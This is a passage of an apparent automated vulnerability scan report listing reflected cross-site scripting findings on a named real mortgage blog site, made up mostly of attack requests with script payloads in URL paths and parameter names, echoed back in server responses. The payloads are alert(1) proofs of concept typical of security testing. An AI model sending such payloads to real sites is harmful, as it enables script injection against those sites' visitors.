GET /2008/04/?5f116"><script>alert(1)</script>31b6d1dd7c0=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:27 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04/?5f116\"><script>alert(1)</script>31b6d1dd7c0=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559a8"><script>alert(1)</script>09fc2a23169 was submitted in the REST URL parameter 1. This input was echoed as 559a8\"><script>alert(1)</script>09fc2a23169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008559a8"><script>alert(1)</script>09fc2a23169/05/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:15 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008559a8\"><script>alert(1)</script>09fc2a23169/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd2"><script>alert(1)</script>a1474685425 was submitted in the REST URL parameter 2. This input was echoed as 48dd2\"><script>alert(1)</script>a1474685425 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/0548dd2"><script>alert(1)</script>a1474685425/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:23 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0548dd2\"><script>alert(1)</script>a1474685425/feed/" /> ...[SNIP]...
1.258. http://mortgage.ocregister.com/2008/05/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05d5"><script>alert(1)</script>c73cc1d7606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05d5\"><script>alert(1)</script>c73cc1d7606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/05/?d05d5"><script>alert(1)</script>c73cc1d7606=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/05/?d05d5\"><script>alert(1)</script>c73cc1d7606=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18c"><script>alert(1)</script>1d447106e74 was submitted in the REST URL parameter 1. This input was echoed as 3c18c\"><script>alert(1)</script>1d447106e74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083c18c"><script>alert(1)</script>1d447106e74/06/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083c18c\"><script>alert(1)</script>1d447106e74/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31fd"><script>alert(1)</script>9ac39e7e120 was submitted in the REST URL parameter 2. This input was echoed as a31fd\"><script>alert(1)</script>9ac39e7e120 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/06a31fd"><script>alert(1)</script>9ac39e7e120/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06a31fd\"><script>alert(1)</script>9ac39e7e120/feed/" /> ...[SNIP]...
1.261. http://mortgage.ocregister.com/2008/06/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a408"><script>alert(1)</script>fcc2185e786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a408\"><script>alert(1)</script>fcc2185e786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/06/?2a408"><script>alert(1)</script>fcc2185e786=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06/?2a408\"><script>alert(1)</script>fcc2185e786=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>9837c07890b was submitted in the REST URL parameter 1. This input was echoed as 3fb2a\"><script>alert(1)</script>9837c07890b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083fb2a"><script>alert(1)</script>9837c07890b/07/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:07 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083fb2a\"><script>alert(1)</script>9837c07890b/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d875f"><script>alert(1)</script>52705fa9729 was submitted in the REST URL parameter 2. This input was echoed as d875f\"><script>alert(1)</script>52705fa9729 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07d875f"><script>alert(1)</script>52705fa9729/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07d875f\"><script>alert(1)</script>52705fa9729/feed/" /> ...[SNIP]...
1.264. http://mortgage.ocregister.com/2008/07/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd31"><script>alert(1)</script>6838ed82b90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4dd31\"><script>alert(1)</script>6838ed82b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07/?4dd31"><script>alert(1)</script>6838ed82b90=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:02 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07/?4dd31\"><script>alert(1)</script>6838ed82b90=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d08"><script>alert(1)</script>16a3cd6aa1d was submitted in the REST URL parameter 1. This input was echoed as a8d08\"><script>alert(1)</script>16a3cd6aa1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008a8d08"><script>alert(1)</script>16a3cd6aa1d/08/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:07 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008a8d08\"><script>alert(1)</script>16a3cd6aa1d/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b270c"><script>alert(1)</script>13e7c115bbc was submitted in the REST URL parameter 2. This input was echoed as b270c\"><script>alert(1)</script>13e7c115bbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08b270c"><script>alert(1)</script>13e7c115bbc/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08b270c\"><script>alert(1)</script>13e7c115bbc/feed/" /> ...[SNIP]...
1.267. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d635"><script>alert(1)</script>be7b47f3057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d635\"><script>alert(1)</script>be7b47f3057 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08/?5d635"><script>alert(1)</script>be7b47f3057=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:01 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08/?5d635\"><script>alert(1)</script>be7b47f3057=1feed/" /> ...[SNIP]...
1.268. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8d85'><script>alert(1)</script>758d680b117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8d85\\\'><script>alert(1)</script>758d680b117 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08/?d8d85'><script>alert(1)</script>758d680b117=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/08/?d8d85\\\'><script>alert(1)</script>758d680b117=1&dem_add_user_answer=true&dem_poll_id=31' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd248"><script>alert(1)</script>480904c2d4d was submitted in the REST URL parameter 1. This input was echoed as cd248\"><script>alert(1)</script>480904c2d4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008cd248"><script>alert(1)</script>480904c2d4d/09/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cd248\"><script>alert(1)</script>480904c2d4d/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5ee"><script>alert(1)</script>57e09d4d961 was submitted in the REST URL parameter 2. This input was echoed as 4c5ee\"><script>alert(1)</script>57e09d4d961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/094c5ee"><script>alert(1)</script>57e09d4d961/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
